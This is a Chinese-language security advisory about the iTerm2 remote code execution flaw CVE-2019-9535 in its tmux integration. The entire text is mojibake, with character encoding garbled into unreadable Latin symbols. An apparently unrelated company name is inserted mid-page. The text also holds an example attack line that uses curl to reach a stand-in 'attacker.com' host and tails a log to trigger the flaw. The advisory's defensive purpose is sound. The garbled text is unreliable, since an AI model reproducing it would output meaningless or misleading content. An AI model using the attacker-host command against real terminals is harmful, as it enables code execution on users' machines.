iTerm2Ô¶³Ì´úÂëÖ´ÐÐÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-10-10

Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºCVE-2019-9535£¬£¬£¬£¬ £¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬£¬ £¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


iTerm2 3.3.5֮ǰµÄËùÓа汾¾ùÊÜÎó²îÓ°Ïì


Îó²î¸ÅÊö


iTerm2 ÊÇÈ«Çò×îÈÈÃŵÄÖÕ¶ËÄ£ÄâÆ÷Ö®Ò»£¬£¬£¬£¬ £¬£¬£¬ÊÇ¿ª·¢Ö°Ô±¾­³£Ê¹ÓÃµÄ MacOS Öն˹¤¾ß£¬£¬£¬£¬ £¬£¬£¬ÊÇMac ÄÚÖÃÖÕ¶Ë app ×îÓÐÁ¦µÄÈÈÃÅ¿ªÔ´¹¤¾ßÌæ»»Æ·Ö®Ò»£¬£¬£¬£¬ £¬£¬£¬±»Ðí¶à¿ª·¢Ö°Ô±³ÆÎª¡°Mac ÖÕ¶ËÀûÆ÷¡±¡£¡£¡£¡£


iTerm2¹Ù·½Ðû²¼ÁËÇå¾²¸üÐÂÐÞ¸´ÁËÒ»¸öÖÁÉÙ±£´æ7ÄêµÄÔ¶³Ì´úÂëÖ´ÐÐÎó²î£¬£¬£¬£¬ £¬£¬£¬Õâ¸öÎó²îÔ´×Ô iTerm2 ÖÐµÄ tmux ¼¯ÀÖ³ÉÄÜ¡£¡£¡£¡£Tumx Ó¦ÓóÌÐòÊÇÒ»¿îÖն˶à·¸´ÓÃÆ÷£¬£¬£¬£¬ £¬£¬£¬¿ÉÔÊÐí´Óµ¥¸ö×°±¸½¨Éè²¢¿ØÖƶà¸öÖÕ¶Ë¡£¡£¡£¡£


¹¥»÷Õß¿ÉÒÔÔÚÓû§µÄÖն˱¬·¢Êä³ö£¬£¬£¬£¬ £¬£¬£¬Ç±ÔڵĹ¥»÷ÏòÁ¿°üÀ¨Í¨¹ý ssh ÅþÁ¬ÖÁ¶ñÒâЧÀÍÆ÷£¬£¬£¬£¬ £¬£¬£¬Í¨¹ýcurl »ñÈ¡¶ñÒâÍøÕ¾£¬£¬£¬£¬ £¬£¬£¬»òÕßͨ¹ý tail ¨Cf ¸ú×Ù°üÀ¨Ä³Ð©¶ñÒâÄÚÈݵÄÈÕÖ¾Îļþ¡£¡£¡£¡£ÀýÈ磺curl http://attacker.com and tail -f /var/log/apache2/referer_lo¡£¡£¡£¡£ÔÚÐí¶àÇéÐÎÏÂÄܹ»ÔÚÓû§ÅÌËã»úÉÏÖ´ÐÐÏÂÁî¡£¡£¡£¡£


Îó²îÑéÖ¤


ÍâÑóµÄRadially Open SecurityÒѾ­·Å³öÎó²îʹÓÃÀֳɵÄÊÓÆµ£ºhttps://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm?_=3¡£¡£¡£¡£Ä£ÄâÊܺ¦Õß»úеÅþÁ¬µ½¶ñÒâ SSH ЧÀÍÆ÷Ö®ºó£¬£¬£¬£¬ £¬£¬£¬ÔÚ»úеÉÏÖ´Ðз­¿ªÒ»¸öÅÌËãÆ÷ÏÂÁîµÄPoC ÊÓÆµ¡£¡£¡£¡£


ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾



ÐÞ¸´½¨Òé


¹Ù·½ÒѾ­ÍƳöÇå¾²¸üУ¬£¬£¬£¬ £¬£¬£¬Çë¸üÐÂÖÁiTerm2µ½3.3.6°æ±¾£ºhttps://iterm2.com/downloads.html¡£¡£¡£¡£


²Î¿¼Á´½Ó


https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/